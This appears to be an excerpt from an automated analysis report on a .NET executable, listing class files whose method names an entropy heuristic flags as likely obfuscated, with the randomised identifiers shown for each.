                            Source: EQdhBjQw4G.exe, diy53dBrWcwwZvRb3yK.csHigh entropy of concatenated method names: 'OhfBULg7uq', 'u6yBixKfU2', 'mLuBMo6she', 'oxi03oBtMDYM2dybTceA', 'rpSO7JBtU3XFrZBhaEZh', 'MNTfPVBtiAcRQvbpf423', 'PIHk5ABtl4Zx0IusKxlQ', 'Db1rNqBtfIpxOLvenQXZ', 'bUI57cBtIKms8TW0VaOJ'
                            Source: EQdhBjQw4G.exe, GgtHJaKvFofL2SmLirD.csHigh entropy of concatenated method names: 'RVjKYEoRH6', 'vfGKrf3ItW', 'NNaKLNpUX0', 'UanKUHAlOq', 'VmSKiGQVAo', 'u5GRLqBmlC3wZEZUEe4t', 'NKfcODBmiYAcXeZsPhV3', 'sPJnlSBmM0SVBWr80P2Y', 'W3nA0xBmfy4eXResxkIj', 'emjvCFBmINqgTYpY3Fmb'
                            Source: EQdhBjQw4G.exe, zcXqPh0jDp61ulOAYaE.csHigh entropy of concatenated method names: 'mXV01TRbUb', 'oxD06URjZP', 'PK10RWEOdU', 'YOO09OAhuA', 'Gbc0nxXNOh', 'W3T0dL2eNF', 'jMo0TCMh0J', 'q2X05YUClI', 'njJ0wIFQlI', 'EQY0yEnu1g'
                            Source: EQdhBjQw4G.exe, jgMU8ydkacaPJdVHpux.csHigh entropy of concatenated method names: 'TGddpYKBAr', 'SgNdCpDd2v', 'g5Adz7QSsU', 'WQSTFJNNaF', 'gA8TB1gGwI', 'OJKTW1SVo1', 'B33ToGG0F0', 'kYLTbIqaDu', 'BuYThOekDG', 'tKETG5lnWC'
                            Source: EQdhBjQw4G.exe, GxpkAS2qDCGtoMW2Z45.csHigh entropy of concatenated method names: 'SRa2CVfrL4', 'X922zoOCQN', 'njLjFPJwMy', 'CvfjBWfUrR', 'Qt6jWD5LwG', 'aomjo5x7GF', 'Rpx', 'method_4', 'f6W', 'uL1'
                            Source: EQdhBjQw4G.exe, ExdXquO4u8gJok9RQbU.csHigh entropy of concatenated method names: 'nxMkmqB9deBFIFpagiIp', 'ckkiKFB99f1lfimWZI8A', 'a4G5ksB9ncfKPStaV3aV', 'DxeyosB9TXkwkwDupsBc', 'gDLrClChjX', 't0E4hlB9sUdLw7NaWCI7', 'PJexjdB9wGiVb3ZVoPeT', 'G91kbdB9yNYVcJj8KdUI', 'f1KdDvB9mOF5drflgAro', 'vXbPwdB9aS3pgpsVQNfD'
                            Source: EQdhBjQw4G.exe, pShRhQWIa2drSH7qeXP.csHigh entropy of concatenated method names: 'FyQWDZHSl4', 'KpcW7Jl6jh', 'CUe70bBgtJK8nVIA432n', 'BDLYMnBg8VfvCHWpUJJ0', 'iqDaUqBgKdBiMm3CWRj8', 'gXhOcvBggVtnDRe7ietv', 'EEgi0QBgun7DewaoZXdN', 'SUqnP9BgQLVPi5dBmhjO', 'gjr0q9Bg2b4oEIPD4u38', 'RVEKMyBgjdnjAjbeT30m'
                            Source: EQdhBjQw4G.exe, OocJJipdCwaDqopQ3o2.csHigh entropy of concatenated method names: 'UfBBGjcnu7O', 'kQJBGHhRIFf', 'rJlBG17dUdm', 'QHgBG6HI5f0', 'FRqBGRirJAS', 'HMrBG9J1qgw', 'FABBGnlqYUD', 'WpkChgUIUD', 'KsTBGdokLi8', 'eh1BGTEklBP'
                            Source: EQdhBjQw4G.exe, TaBBsEhU1d1IoHsAgTS.csHigh entropy of concatenated method names: 'LyyhtP8TW5', 'Uwrhgfq68A', 'i9LhusMOPp', 'Eyy02HB2sAmJc9YlGkjA', 'E4u66HB2mVCmyjOJnnud', 'SOdpaoB2wbLcxGxI3P2n', 'mERrqeB2yF0CEbXQniev', 'fnyh46ygPK', 'NINhcNvABq', 'IyC6CtB2TpAQ98whtpN2'
                            Source: EQdhBjQw4G.exe, wUOou9d26E3HSELsovN.csHigh entropy of concatenated method names: 'DcadHHH1F9', 'R5Cd1msyw7', 'Rysd6baRVf', 's5DdRgXULc', 'Kx8d9egB8J', 'pUCdn6T2Wb', 'OR0ddotltX', 'dlXdTgeHWF', 'MA1d515BrE', 'hBLdwFW8yI'
                            Source: EQdhBjQw4G.exe, e1iSR3yfl3b97CK9VW.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'UGBmn2BiO'
                            Source: EQdhBjQw4G.exe, AZnjlsbjRqt16S3abmL.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'JesBeblsQVJ', 'vsbBbBgVvD9', 'M36VkrBQ9nsMrUFRtjCu', 'HM95IlBQn6bLaVDZII3O', 'Y4XAIaBQdyuZBLqIlQ8D', 'gV5OtnBQTiHMykGf5RC3', 'ATVJX1BQ5YhkvFmfjeBA'
                            Source: EQdhBjQw4G.exe, kYFrqeOWJqcqQWiRAIj.csHigh entropy of concatenated method names: 'r2wObXG6Z3', 'LuqOhHpLff', 'oOqOGjy1F0', 'DnZOERsrAh', 'kAXOeZKtFn', 'aGgOO1Q9jv', 'HTgOATGXfm', 'DgjOvLthDj', 'VUcON7H6Ss', 'erFOY1UvIH'
                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.csHigh entropy of concatenated method names: 'LycqT3BpNnGZgEaKV5Bu', 'FpQsLkBpYoIGyL3HMDuy', 'CJ0qVtdQXE', 'PRcu8UBpiM464k4v7bnA', 'rrNMYTBpMiCpHslKVBYG', 'tDHLkpBplYtUbZDtjHHV', 'Ymdf88BpfFWeaQBRCWNU', 'aVycXkBpIcwjsY6V5JDM', 'Gh7vGBBpSq4wA48u6BHm', 'LApGpLBpDXDrIpx1MXV1'
                            Source: EQdhBjQw4G.exe, srIBSV3T3QDWvbk6hSt.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'JIr3wl9lPu', 'C9O3yYZl9O', 'XLA3seyRFl', 'Dispose', 'sbUwlKBq2ujhsM7c9Q1d', 'yQ65SsBqjqhGWmXnnhlH', 'tv4kw5BqHPWXiHDo3S9b', 'byP3iUBq1gAuHaGB62RW'
                            Source: EQdhBjQw4G.exe, EXweAMWx1ebw7mIO4rs.csHigh entropy of concatenated method names: 'h6SoECMrBW', 'MCaFqXBuWWjG8mU7FcaR', 'srqxk5BuoaYWnPRbYSch', 'UGU8iKBubAgHxc7XBFnB', 'TNC8DABuFI3GOGxvNb8X', 'nLDBmJBuBAHUtpuu8IFT', 'BJVGFQBuhY40AhOnoDPw', 'fxnHe4BuGLD63WMOGOTh', 'QjLoFidnN3', 'cUXoW3yFED'
                            Source: EQdhBjQw4G.exe, mCmEvlG1adNmJgqOK9p.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'L2bBeAyroIF', 'vsbBbBgVvD9', 'aLwC54BjPZBFDbXWGZye', 'pB0lhRBjxKR81MPbjMgy', 'ON2KswBjZf158DGByYTY'
                            Source: EQdhBjQw4G.exe, k5BYRieTsKpNuP1XJtp.csHigh entropy of concatenated method names: 'P9X', 'ncjBeNX9u3d', 'imethod_0', 'PcMewiyhTL', 'MtVRHuB6oIs1hPP8Cpsx', 'sTOgLtB6bF0ncwyrYEGV', 'CpfCeXB6hYnp0l8ymfHY', 'CyaB4eB6GwUjbOIfcAkx', 'gI3WefB6EDPrdcQ32PKT'
                            Source: EQdhBjQw4G.exe, RTTQdtkFvsxQjC3PB01.csHigh entropy of concatenated method names: 'ugrkbhPTf5', 'nTwkhNcVop', 'yqjDCTBqJNw5Y7DXYb03', 'dcu58pBqVxd55PDuZ3K0', 'SlxsI9BqxG0S9SMs7aAm', 'jtgumqBqZWbQW8Qy94hI', 'CmiWRWBq05xOB8ZpooDF', 'cupkZRBq3jATyxvwYVQp', 'r1XkW84KAh', 'OwfgdaBqagOTBRkjeKXZ'
                            Source: EQdhBjQw4G.exe, gTMos9uTKdEioQCYKH7.csHigh entropy of concatenated method names: 'd8duweueI0', 'ljEuyHjt9m', 'XPbusgEcEv', 'JqBumHLOci', 'Ax1uadIEVv', 'TqTuX6B1V3', 'mCruP0cCk3', 'wyhux7D4FD', 'uLNuZthXNw', 'RXAuJ04vs7'
                            Source: EQdhBjQw4G.exe, NSeAsngCUwR5n5mL0aM.csHigh entropy of concatenated method names: 'lO1uFahVr9', 'pN1uBOft7H', 'G35uWuBkjO', 'FmruoymnpH', 'bcIubbKnJr', 'f5UuhLerNa', 'AugJI9BXWTnB78neIdeT', 'fSQGqIBXoxFxSDPsm00k', 'b4yhwnBXb0My6PngQMiU', 'tE9SiWBXh2fkkxf1AE18'
                            Source: EQdhBjQw4G.exe, qCZwyhbdEQh3NNmKEmh.csHigh entropy of concatenated method names: 'hlGbprItCq', 'wkMEukB2ARsV7mtGEEcl', 'Y5t8FpB2vMe0qeroPq7l', 'fgwfH4B2euIxpRfV4Ull', 'W0TPtHB2OQGEyGjvSflJ', 'oTrvkUB2Y2AKr7cbcULh', 'nuKsv6B2rZHh5OCxAXHr', 'tWmKGsB2LMnAR9k7jWCn', 'NgAhGXnGfy', 'yfETxFB2lG46ahLUZh8E'
                            Source: EQdhBjQw4G.exe, h42w0xERl89tHIGnMwC.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'QhcBb4Oae2B', 'PS0BevfForG', 'imethod_0', 'E8EtnoBHz2icAk5il87L', 'V4cHolBHpgjwHyca8rSX', 'xTtdfYBHCS7tScGAKxIM', 'Q6nJ5IB1FHdJOwI2Ww8C', 'JaJggZB1BuhqRFIfr9MH'
                            Source: EQdhBjQw4G.exe, PgSvgRInbf73nn4OdlE.csHigh entropy of concatenated method names: 'N2N', 'B2sBeLxsidM', 'BlxIT7F41a', 'pbIBeUJWUQG', 'tmvItRB5lyuj0RnjnDtt', 'jBCBWNB5fr1tfZk4EujU', 'e67VVoB5itDVXy31NUm0', 'smFTueB5MC1G9JViQLUV', 'aVicPAB5IP5u2NyBmnAj', 'InPwrhB5SSDqfkKrTYD9'
                            Source: EQdhBjQw4G.exe, qyon45WhsxBdXF8B5V5.csHigh entropy of concatenated method names: 'EO5WElGV6K', 'iBSWeRfxyP', 'J18WOWibEe', 'EWEWAXEjPi', 'HaLCquBgrHNpeIqoj38A', 'n2AnORBgNRGRY8UBdwQG', 'OoZFRVBgYbXomHAakwmu', 'S8UkOQBgLQ8I950KQexT', 'DI9S9MBgUm65C5XK79Wt', 'YKWPdCBgim60aEVG8djs'
                            Source: EQdhBjQw4G.exe, CyOhDqR6HWUDLBBGMQ2.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'FpLiHxBJR5tWIQSCr54f', 'GTT88nBJ9ZMsirB8bR5X', 'i73'
                            Source: EQdhBjQw4G.exe, AZYPNBnO3mDHCwYpu4w.csHigh entropy of concatenated method names: 'KHAnc9Rytk', 'DuPW23BVSNLoFwrAwgUb', 'f03Dy4BVDNX4ObF3uZkw', 'NAbBR8BVfCPufIivlLyU', 'Cc7N74BVIwACCLvBe9fB', 'eLkoCXBV7ocjU7m1vrYu', 'IPy', 'method_0', 'method_1', 'method_2'
                            Source: EQdhBjQw4G.exe, H59UY4h1pn10rLXwn5x.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'AmQBbvC4pi4', 'JnEhRdPtEo', 'imethod_0', 'Hko1I4B2XSwUXZu1EalE', 't5VyeFB2P8OfPYIgEn5Q', 'QMrUmaB2x8edu447ivLX', 'aIuA4VB2ZuPr8VomLNMs'
                            Source: EQdhBjQw4G.exe, kVsQtY1xC0ZxxRYA1kj.csHigh entropy of concatenated method names: 'iUYXb2BJYYi64J0sBI0e', 'yBqxWRBJv56LEAuc0g1o', 'bXkJQvBJNnGaN4ZbYiVn', 'akC1J7TxZJ', 'Mh9', 'method_0', 'A2M1VQiiXF', 'uIs106M7tl', 'Jvn13Nx7BY', 'buo1kxg513'
                            Source: EQdhBjQw4G.exe, KlRO0h2eV7AJEWwGh7b.csHigh entropy of concatenated method names: 'qpV2AtswvX', 'd262vqaxZW', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'ghQ2N6c112', 'method_2', 'uc7'
                            Source: EQdhBjQw4G.exe, Rlc4s1nsJqIMAUQsFGS.csHigh entropy of concatenated method names: 'd5pBecIIvhT', 'UX6namps4r', 'jGwnXlmO6t', 'tTFnPi3dJx', 'yJfbsgBVHDrq9RytU8uq', 't0jv7SBV1uDgBoqswmFj', 'KpWXKIBV6VLyFhKH23Gr', 'RVQqvOBVRdtxeMWhR1RO', 'CRYYJaBV96hrVjOP1Q2j', 'o4Fwt2BVnPVZ2bMeLEOA'
                            Source: EQdhBjQw4G.exe, zdg4PkhOt6IpnbdZGX1.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'IL7BehiJRcf', 'vsbBbBgVvD9', 'bD1XkUB27bHsR66BsKAU', 'HDBLcKB24a0eyDK5rgll', 'lmcfo0B2c85WieVZF8QX', 'Qi9TVCB28LyWLPbepyVf'
                            Source: EQdhBjQw4G.exe, iK6x8nplJYDUeXdMNSF.csHigh entropy of concatenated method names: 'VoLpucXNUG', 'MfOpQMbZrZ', 'Axdp2Sg0Bl', 'UAZpjFhUbu', 'QLcpHhNKYY', 'OXvp16FH22', 'ynrp6EbafE', 'vZUpRimlrb', 'j4kp9hKjdR', 'DPBpnVVqrG'
                            Source: EQdhBjQw4G.exe, apAIfpW2AAIE7nqvUcD.csHigh entropy of concatenated method names: 'kVQW50RsDt', 'bY3Ww20lSl', 'WJX8JaBg5kd5MCbTaQZx', 'nL7cjABgd3yIBVRPcTmS', 'TBwFZ1BgTrtxtobbtP9H', 'qCCgPFBgwPGExPybGmkV', 'LCVWauQZL7', 'HsYtpyBgaIEUvVC62ySV', 'iDjwbBBgXYwMluXujgxC', 'H21SlyBgsNoQaKEl1ExT'
                            Source: EQdhBjQw4G.exe, qsKI1XBCCmeXlUAqm2Q.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'NGiBeB4RyJL', 'vsbBbBgVvD9', 'lmG2eqBtzPa3PeV8Rapp', 'ni6VYxBgFkH4bMhdBJq1', 'fL9yHtBgBwKbmBmLmM4T', 'LnvCxsBgW28sTNiCSLuH'
                            Source: EQdhBjQw4G.exe, t9D1HoV9py79ppWYIty.csHigh entropy of concatenated method names: 'BQXBeKoZRbu', 'UfJBG8GeVsn', 'rsEfIoBkrU48V60Pq6XR', 'v7yYYfBkNGSlWTpPaXXJ', 'CLUdeGBkYmSiZG2pgKHX', 'ounHgtBkMBSxqNRRstZ9', 'D7ZSL3BkUgHg92wIEhcQ', 'lveDxFBkiwrMlPITWs8j', 'uDGeSRBklwqB5lOtMEDw', 'imethod_0'
                            Source: EQdhBjQw4G.exe, eKPdhSK2vF5JmSfD0At.csHigh entropy of concatenated method names: 'method_0', 'HyPKHbwU7T', 'R0NK1a4kCm', 'z8YK6jc9vN', 'kRkKRmGsZL', 'u9UK9RDHjB', 'chqKnjgqBJ', 'gLIhioBmuXoidRXgqPU4', 'ebTc2oBmtFnXQKkNDdX3', 'QDMVrUBmgLYR7YsLLpol'
                            Source: EQdhBjQw4G.exe, rIDODOjSC2BqYJUV8EY.csHigh entropy of concatenated method names: 'PL4Hrg0ewf', 'AuZvc4Bxq7SkU02T0BTf', 'KuYJo3BxpP7hHGSBjnVU', 'JDjQcgBxC1WCbLk0Yhqe', 'kt5', 'zRKj7tEdJy', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                            Source: EQdhBjQw4G.exe, fXp7lqG5b1419J0hlcb.csHigh entropy of concatenated method names: 'eYwG34kLX6', 'AikGkpAKmi', 'fhTGqjLURt', 'F9KTkRBHOsrYOASqprXr', 'YHT25yBHAp0yu5PYHmdu', 'iC44MIBHEELEkBLuZqwX', 'Sr9S5cBHeuboLQhR9Lfb', 'RhYGy9xEpn', 'usDGsZeM7R', 'bHEGmAKKgg'
                            Source: EQdhBjQw4G.exe, zHtZF1etB8Yi7MPQT6H.csHigh entropy of concatenated method names: 'bCTeuMpWdF', 'bAHeQyX0gP', 'XFSe2mecvr', 'gd1ej3DBwe', 'DTOeH0oj69', 'BoRe1CIgTH', 'Xb7ETKB13JlEll6EHmp0', 'lpSqgaB1kHCsbyIg7Zs0', 'aharu8B1qIyKrVYwTVX8', 'ygc6q5B1p1iV9H3UkL4Z'
                            Source: EQdhBjQw4G.exe, jJiAf1toa8x8xy1AQV0.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'xymthtALHf', 'Write', 'h4qtG2jxXN', 'fLFtEtGgNX', 'Flush', 'vl7'
                            Source: EQdhBjQw4G.exe, LmLrE9hyXmNT5PPn4aC.csHigh entropy of concatenated method names: 'hxIhPtMb5F', 'Soe4nRBjOdFkVGa2lqnF', 's9va2hBjEcQYsOqDKiOX', 'eqOq60BjeCDu81rhCS3C', 'PSJDAgBjAayASIt7x3WG', 'vN1opWBjvYjwtYQDEsvs', 'U1J', 'P9X', 'KEXBbU8KOAi', 'qCaBbi4S71Q'
                            Source: EQdhBjQw4G.exe, Al58N732kOrItwneVtY.csHigh entropy of concatenated method names: 'JHa3HHMjid', 'uPP31MDfAb', 'ToD36k62VK', 'GPo3R6SiOh', 'Dispose', 'eWCRXPBq4XZyc85rCDBf', 'gKNIgwBqDqWtlXXFZEPb', 'xTstLVBq7teF4QqxgMFf', 'iI91LTBqc0ahTxoWrw3G', 'exh72yBq8HkTHS3qqOHv'
                            Source: EQdhBjQw4G.exe, bsnLd9gJsIZetF640ZZ.csHigh entropy of concatenated method names: 'LLag04a1Ka', 'UDdg3KGyHL', 'crDgkWns9j', 'Sg6gqGXTQV', 'biNgpNfcfW', 'rDUchtBap79rgTnR4XIJ', 'KAEbCSBakNGiuJK222yl', 'lP3floBaqyUVhAput0AR', 'X2bG3NBaCOXjFiPUXe5j', 'ghySvHBazppP5x06dOhd'
                            Source: EQdhBjQw4G.exe, LnLuPu8V05FNYi6y8hO.csHigh entropy of concatenated method names: 'FDN83N5k6a', 'HHc8klG5dC', 'hBw8q3xgVl', 'DfdRH3BmN58hrZBER71M', 'NCO87cBmAPyYXGR5nJPR', 'aT4FtOBmvqTt40r2tCf2', 'lHXenjBmYEhIbYfSijsV', 'fvp5fmBmrqSIE6sVunEb', 'Ql6lc1BmLs3fgxMhNZur'
                            Source: EQdhBjQw4G.exe, rXIKIlt5hpLfV0UYWn9.csHigh entropy of concatenated method names: 'oBFtpjKS6M', 'vkGtzIrcKj', 'BcZtyiBgYZ', 'GJKtsqR7mD', 'uiUtmnbZ8s', 'zwNta3P0cF', 'CqutXncDq6', 'PmAtPMRU9u', 'P6HtxnwgyK', 'iYDtZSkBqN'
                            Source: EQdhBjQw4G.exe, ClHWXZV2ybTDWrJFBuS.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KRNVHQSMOD', 'n01ZUgB3TRCPPtuykZQk', 'co4ZnUB35Ska5wbxWmB5', 'wxxNmbB3wFAcyjG5hxWM', 'WNQXbgB3yIq3SD6Whsv4', 'onwmn4B3sjvC86mwlJxd', 'jSMoiiB3mZjMSUmpP80N'
                            Source: EQdhBjQw4G.exe, HmYtZv4ZSpFB0RhGH9K.csHigh entropy of concatenated method names: 'qyf4VY39Ih', 'hL540VjVip', 'H7g43rs6Jk', 'kLj4kR7aPD', 'UZl4q44TVg', 'OOqvXXByzg1Cp9QHm3QD', 'sJ9hyOBypuZ57hQPMh1d', 'lfR5E3ByCmSiG8aZl3GU', 'MuUIZPBsF6vJbEWSlwNK', 'ehcwLqBsBU1XCdlVkrux'
                            Source: EQdhBjQw4G.exe, enAZfvE2nMXWbSsbAWm.csHigh entropy of concatenated method names: 'hW2EHE7BYs', 'YfBE1CXjX6', 'Of8V55BHZx71I2rjvIxm', 'gUAFIyBHJKAoM8NTjf12', 'f5WvlCBHVIL3xnIKeyva', 'CfbI4MBH0tqlsKuOiUHi', 'wgtosWBH3frNAhktQkE2', 'jc0CJkBHkuyYoswMM0P8'
                            Source: EQdhBjQw4G.exe, TrZZsgH6a6kj72ret59.csHigh entropy of concatenated method names: 'Close', 'qL6', 'go1H9xROhM', 'OOqHniCYrC', 'n8CHdiqcj9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: EQdhBjQw4G.exe, DUcSpHEfS4moNfpCwS8.csHigh entropy of concatenated method names: 'RmqEgO8qq1', 'AqkeVCBHmBAXVOCWWPAe', 'Ll1WK9BHa2atfjDuIudk', 'LdMM7kBHyIrPLHYjsOxx', 'dBk9uqBHs2hy7Uutc5A4', 'g7mtlTBHXVbGHqd9MBLl', 'TCDup1BHP3JIgg8yj2n1', 'rQRESYJUYc', 'Jm6EDv7yif', 'i57E7tDvil'
                            Source: EQdhBjQw4G.exe, oCY2SlL7HVNOmfawgMX.csHigh entropy of concatenated method names: 'OxlfY74GhX', 'YX3frxy3G5', 'f2mh0SBdZIrop8PPMH7k', 'qYSftDBdP41QoTv5Rqdl', 'EIbAqNBdx3a9DapIn7dg', 'P2g4DmBdJtd7WikhUSsX', 'jiesCeBdVZRhAcxd9LWi', 'CRPfff7IZV', 'FuSEu8Bdq5sIViKWqmUZ', 'vES8xBBd3VBNOureDIKC'
                            Source: EQdhBjQw4G.exe, stwjW6IrY3dA5D2SnIF.csHigh entropy of concatenated method names: 'KUfIIMnRlL', 'gdAd3QBTC2MRIxWkypQx', 'DExJx8BTz9Mt57t16ksa', 'KyPtn5BTq0TISJ6NgREk', 'wiRNBGBTpKRqc0QiZZXM', 'ujIIUweNVc', 'MbaFcYBTZ4TP9eo0eQMg', 'mQIILDBTP0Yv6D3G7eo2', 'KskMGDBTxFkpI8VS2OXo', 'v5naiYBTJNrlGofkpZZk'
                            Source: EQdhBjQw4G.exe, o85UtLpraMtZAmto0dI.csHigh entropy of concatenated method names: 'ae9WhwfC7SI', 'Gj8WhyffnnO', 'WMmswnBp5sARuwVaqMtG', 'YNRRmXBpwK1b9qJiHnE1', 'GcZ3G3BpyvYdAXOoCZWN', 'jUrxk9BpsgDPmeZLxJy9', 'xAZwnlBpm8n1TQTLYWmc'
                            Source: EQdhBjQw4G.exe, twd8kYEO1ytqitJQfSh.csHigh entropy of concatenated method names: 'M1FEv2GgGQ', 'cunENQqH8c', 'VjWkcuBHI0ybRyFSCAKv', 'bDMHe3BHlFcDWabaXRFZ', 'D9ovonBHfDk4rnICpeS6', 'N9LiKpBHSeY3e89E3byw', 'l7AthoBHDQ7EtDs7Qx0x', 'Gbd7RdBH7172Jt787Otx', 'L419m9BH4hnKjw8kxsbZ'
                            Source: EQdhBjQw4G.exe, k3xYrwoKEE61HhWWyfW.csHigh entropy of concatenated method names: 'LO4ow1lmsE', 'cdCoyJjl9N', 'trMostSuLP', 'Jq98FCBuaRbqoF2on8G4', 'DsLEOQBuXutQFnH6lUGu', 'POgBjcBuseb8ME6NTCRf', 'wjCW3cBumd1ZS5hTev4M', 'L3UogGMw21', 'TuPou7yNv4', 'WFdoQNtUY6'
                            Source: EQdhBjQw4G.exe, tXwkxtcy1WO27G0cK0B.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'sK3cmkQWHf', 'TZfcauPwFN', 'Dispose', 'D31', 'wNK'
                            Source: EQdhBjQw4G.exe, x8BYk5eDi6k9Q3Oiq3H.csHigh entropy of concatenated method names: 'cvNe4MRLRi', 'FUAIJBB1wTSZo3jHZudW', 'p2CCEDB1yFtjCMinDDl8', 'QZp49VB1srXm97CfW71X', 'NVvrJIB1mlMosUV3SFwL', 'NF4CWNB1atFmucmpZixM', 'BIsOJ1B1TLq8fjp1MEqY', 'hsUgLCB1542QsrwOTiH2', 'fD95aGB1X9fHQHF0eYhe'
                            Source: EQdhBjQw4G.exe, DjKOdxeiZLQovTeMAYt.csHigh entropy of concatenated method names: 'tNWeIKAo4P', 'DjiCXWB19YhP3jQNPjb6', 'ObPJ4bB16HqfcWeNHD7g', 'TcokS9B1RPWUYrmPjcub', 'dQ1bEdB1noCtR4qaw2oc', 'ONTelcdvsr', 'YcVj3DB1QvfxxRaqGYU8', 'PlQHhkB12gwuZfm9htsm', 'IOdSedB1j5gvQBJLpogs', 'JMEWZBB1g7OfOtpQ5Go3'
                            Source: EQdhBjQw4G.exe, uI0Im2SvXU18gDMi4bJ.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'kKpBeDG4OHN', 'QKCBe7KUeCv', 'sJBfBSBwFe0tW1e4cp3T', 'IwV7nxBwBI0U6nKklj6y', 'VcI8XNBwWiSSOcIdq3i6', 'NpY3nWBwo3Qblw2ci80t', 'etq3vqBwbeuI2571dLcK', 'F6IOxgBwh5uMQEEsfFbM'
                            Source: EQdhBjQw4G.exe, yKQdHRLv1jjwLqb4ANG.csHigh entropy of concatenated method names: 'Dispose', 'JFSLYShZAM', 'np7Lrjny2M', 'rr7LLmJHl4', 'qGkx9DBnWN6KaCHSDbaS', 'GOHn1mBnoMwEwEcc63MX', 'fXprBaBnblFu0YIdMyE6', 'aoFI7oBnhB0Iya8WRw85', 'rP7TcGBnG1p5yU9DnXaT'
                            Source: EQdhBjQw4G.exe, oA2QLi4ABhBPRrPch9X.csHigh entropy of concatenated method names: 'm9I42vxVg7', 'kwG4N4RTcX', 'l4T4YggpdC', 'yX44rYwxWJ', 'nAF4LdF5v0', 'HJ64UfggQD', 'sfT4iPbuLd', 'Gn64MU6cAx', 'ltH4lSmiTS', 'cwk4fyvXeI'
                            Source: EQdhBjQw4G.exe, cXdLKLoxGV0QwOwe0Lf.csHigh entropy of concatenated method names: 'TZZbocFF1v', 'bpvbbc15hs', 'ruXbhGpB9Y', 'DgweLVBQeRPiEs83iEw6', 'ttmoj7BQGpLAkvWspqWW', 'dLIjEnBQEeAVJesshhu4', 'yp0bvsYMpc', 'gsUWWqBQNuocIRiUTYkr', 'KwNb0jBQAGg7c2efeG6S', 'exIh72BQvWIBb9GejW0H'
                            Source: EQdhBjQw4G.exe, OdvTcVMcKLZYX9cm7v.csHigh entropy of concatenated method names: 'tT11gWacO', 'TWeeUsBK2DfhRUHkGSYF', 'gr8DGBBKj4iLmmokSFP2', 'XlggTCBKuoFtQvdmiGZ7', 'xdbtQvBKQcC552atAxC8', 'XerfokBAZ', 'Hj4IH37QQ', 'hr5Sg46Pu', 'qYfD1iDTH', 'jLd7tGC6M'
                            Source: EQdhBjQw4G.exe, ojsYqUBlDcRWPhPNiG3.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'enGBEzQHt6O', 'vsbBbBgVvD9', 'vueIAeBtDlrt41KE6j9S', 'Lg8RAvBt7t5BPDqk8Jm4'
                            Source: EQdhBjQw4G.exe, Buu5PNOr4acgMAQ78hn.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'cPn6hiB65bc6pFSj6Ksr', 'V8RlWMB6wXcV8726Gn3V', 'qqNCW5B6yUePRf9kBMe1', 'WjhZRrB6swIB2hHS4dLa'
                            Source: EQdhBjQw4G.exe, O4Je4PDY6J77dl0QcmP.csHigh entropy of concatenated method names: 'UZ64BSFwmY', 'Hb44kJBy1k4v8SWOkxT0', 'VrPYymByj1ZdGMi330jT', 'oLk3SBByH2a9CU7fJrc2', 'cU2q1UBy6KDRHpDo5SSR', 'z5sDLbBfy8', 'JfKDU0yiQ0', 'bpVDieblkP', 'krQDM7mVj5', 'knWDlTjApT'
                            Source: EQdhBjQw4G.exe, OBJLJsfVH5D7ThnEo4x.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'hwNBeY16Grm', 'rlCBbmU8MKG', 'FPUUnyBTtHAiUUVcKm9r', 'fFKq83BTg6PiPSWC3k1b', 'POCNvHBTutI2grcKfYtj', 'wlOt71BTQcpY6EB1nUMi', 'eU4tcbBT2uCbvI1f0YVb'
                            Source: EQdhBjQw4G.exe, NNnb4gzghdssDB6VLt.csHigh entropy of concatenated method names: 'E8wBB4T0OK', 'j9yBog8C2P', 'lTcBb9EHYl', 'nknBh8tUen', 'vFoBG2VuZG', 'YCKBElrPhi', 'z6pBOegW9v', 'pQ4e7pBtEFjQD1W1sEHm', 'gvBVZ3Btep3X8OFnkdsm', 'DKyGq3BtOt6r1f9P9ioo'
                            Source: EQdhBjQw4G.exe, U5dnxvE5VR0MeFLnbxw.csHigh entropy of concatenated method names: 'qvvE3SoHdg', 'JqvEkdIhtg', 'YZcMoKB1eHeCF1cenjWK', 'wA2syVB1OLm6HWiE8GRO', 'VyjbsfB1AtSYHZjOCjXP', 'ViQEyYqZB4', 'M8aEsEVlSq', 'RCHEmTcjHQ', 'oTMEaYZpl9', 'yFxEXTYbSm'
                            Source: EQdhBjQw4G.exe, P1odymeAyUUZWKNgH3a.csHigh entropy of concatenated method names: 'X8YeNMS8Ub', 'chweYj9AKa', 'CLPerhitae', 'oQFW3VB1D0d4RupnrHuN', 'BRkvGtB17kGDJCj6uoO3', 'Jf1GPkB1I9YO5XCnqjXe', 'jO8ccMB1SCLdMVvauXAX', 'G7BgEoB14dhPfDMDT7jW', 'BI4Xr7B1cxRZ5SSsiiPv', 'nG2AyDB18pLtVAH7GiE5'
                            Source: EQdhBjQw4G.exe, HrFkDehZW16MTWXnhDp.csHigh entropy of concatenated method names: 'huxhqHfN3J', 'vkchpaLpMU', 'gfhhChs4mg', 'A0ShzwRR7v', 'ifRGFXaUfR', 'u87GBQbho6', 'gm6GWUKjDT', 'QnbxClBjIT59xuwSiQTe', 'xP4EatBjSVa7wGbtGuDp', 'pMh4tkBjlEh4HTqEOPoS'
